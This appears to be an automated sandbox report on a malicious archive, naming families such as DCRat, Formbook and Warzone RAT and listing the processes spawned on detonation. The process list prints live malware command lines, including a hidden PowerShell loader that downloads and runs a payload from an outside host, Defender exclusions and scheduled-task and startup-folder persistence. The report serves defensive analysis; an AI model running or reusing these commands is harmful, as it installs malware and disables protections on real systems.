Analysis Overview
SHA256
e33f116c4d031b092c1aa75e0cb68b5db4e362739a6b41c27475c3a0ddb32b3a
Threat Level: Known bad
The file 2023-08-17-18.zip was found to be: Known bad.
Malicious Activity Summary
Dcrat family
Formbook
WarzoneRat, AveMaria
Amadey family
DcRat
WSHRAT
DCRat payload
DCRat payload
Formbook payload
Warzone RAT payload
Office macro that triggers on suspicious action
Suspicious Office macro
Looks up external IP address via web service
Unsigned PE
Program crash
NSIS installer
Office document contains embedded OLE objects
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Runs ping.exe
Gathers network information
Suspicious behavior: AddClipboardFormatListener
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-17 19:40
Signatures
Amadey family
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Dcrat family
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Office document contains embedded OLE objects
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-17 19:39
Reported
2023-08-17 19:50
Platform
win10v2004-20230703-en
Max time kernel
68s
Max time network
577s
Command Line
Signatures
DcRat
Formbook
WSHRAT
WarzoneRat, AveMaria
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Formbook payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Warzone RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Office document contains embedded OLE objects
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\2023-08-17-18.zip
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\2023-08-17-18\" -spe -an -ai#7zMap7070:84:7zEvent9404
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\2023-08-17-18\0bc5ba29090a537426e9f198bc924a23403155a2dcb848a58280f6205f4fd6c1.xls"
C:\Users\Admin\Desktop\2023-08-17-18\0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35.exe
"C:\Users\Admin\Desktop\2023-08-17-18\0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\comRuntimeCrtdll\reJQeYd4I.vbe"
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\comRuntimeCrtdll\1yEJ1LJx7Aonc2gKvRqS.bat" "
C:\comRuntimeCrtdll\agentbrowser.exe
"C:\comRuntimeCrtdll\agentbrowser.exe"
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\2023-08-17-18\4e8d2ed372068535d420927ad0f59dd34eda4f33f7bafcec6b694379b8948487.jar"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2023-08-17-18\7a57c3bcbdfc2482505bcf4c20885c1288635f780667a5cf4c7f0804251dd719.js"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TGDEJN.vbs"
C:\Users\Admin\Desktop\2023-08-17-18\9c60202f8f982a2cd9c02450186b611e472ea1f842e6ba6bdaa7eddcf8f254e5.exe
"C:\Users\Admin\Desktop\2023-08-17-18\9c60202f8f982a2cd9c02450186b611e472ea1f842e6ba6bdaa7eddcf8f254e5.exe"
C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe
"C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe"
C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe
"C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe"
C:\Users\Admin\Desktop\2023-08-17-18\6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277.exe
"C:\Users\Admin\Desktop\2023-08-17-18\6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aug.vbs"
C:\Users\Admin\AppData\Local\Tempwinlogon.exe
"C:\Users\Admin\AppData\Local\Tempwinlogon.exe"
C:\ProgramData\images.exe
"C:\ProgramData\images.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe
"C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe"
C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe
"C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe"
C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe
"C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe"
C:\Users\Admin\Desktop\2023-08-17-18\84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8.exe
"C:\Users\Admin\Desktop\2023-08-17-18\84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8.exe"
C:\Users\Admin\Desktop\2023-08-17-18\82d48c9bb4936387228e0de374d235ac364bd4011519b988623707cb7025150f.exe
"C:\Users\Admin\Desktop\2023-08-17-18\82d48c9bb4936387228e0de374d235ac364bd4011519b988623707cb7025150f.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Users\Admin\Desktop\2023-08-17-18\76fb6717f8683e5d892659a5e1163f424596b0f61c221ae6c677707ae94387dc.exe
"C:\Users\Admin\Desktop\2023-08-17-18\76fb6717f8683e5d892659a5e1163f424596b0f61c221ae6c677707ae94387dc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4088 -ip 4088
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2023-08-17-18\940387888527e0efd604a126935a6174423ce34d15dc1fd7b7c894b78985ad71.rtf" /o ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 1324
C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe
"C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe"
C:\Users\Admin\Desktop\2023-08-17-18\fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a.exe
"C:\Users\Admin\Desktop\2023-08-17-18\fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a.exe"
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\2023-08-17-18\f97b4c1a380242c5efa234bd8ae966805071ff7dcf10ac44e69cdc9dd1a7eb1b.xlsx"
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"
C:\Users\Admin\Desktop\2023-08-17-18\f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52.exe
"C:\Users\Admin\Desktop\2023-08-17-18\f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52.exe"
C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe
"C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe"
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ POX.vbs')"
C:\Users\Admin\Desktop\2023-08-17-18\b0351062f7da26f1a85c0e6ed3edeb701aec500391a62b8f382f97084b395749.exe
"C:\Users\Admin\Desktop\2023-08-17-18\b0351062f7da26f1a85c0e6ed3edeb701aec500391a62b8f382f97084b395749.exe"
C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 5
C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe
"C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe"
C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe
"C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe"
C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe
"C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe"
C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe
"C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe"
C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe
"C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe"
C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe
"C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe"
C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe
"C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\RbsgeknsO.bat" "
C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe
"C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\uiVprBevwjFGG.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uiVprBevwjFGG" /XML "C:\Users\Admin\AppData\Local\Temp\tmp50E0.tmp"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c mkdir "\\?\C:\Windows "
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe
"C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\szBUFHBkBccpfd.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\szBUFHBkBccpfd" /XML "C:\Users\Admin\AppData\Local\Temp\tmp91D1.tmp"
C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe
"C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ipconfig /release
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
C:\comRuntimeCrtdll\agentbrowser.exe
"C:\comRuntimeCrtdll\agentbrowser.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\comRuntimeCrtdll\reJQeYd4I.vbe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\comRuntimeCrtdll\1yEJ1LJx7Aonc2gKvRqS.bat" "
C:\comRuntimeCrtdll\agentbrowser.exe
"C:\comRuntimeCrtdll\agentbrowser.exe"
C:\Windows\system32\cmd.exe
cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ POX.vbs')"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\comRuntimeCrtdll\1yEJ1LJx7Aonc2gKvRqS.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ POX.vbs')
C:\comRuntimeCrtdll\agentbrowser.exe
"C:\comRuntimeCrtdll\agentbrowser.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.senym/842.15.67.08//:ptth');$method.Invoke($null, $arguments)"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ipconfig /renew
C:\Users\Admin\AppData\Local\Tempwinlogon.exe
"C:\Users\Admin\AppData\Local\Tempwinlogon.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /renew
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aug.vbs"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TGDEJN.vbs"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff6d0e46f8,0x7fff6d0e4708,0x7fff6d0e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 444 -p 388 -ip 388
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 388 -s 3664
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2548 /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
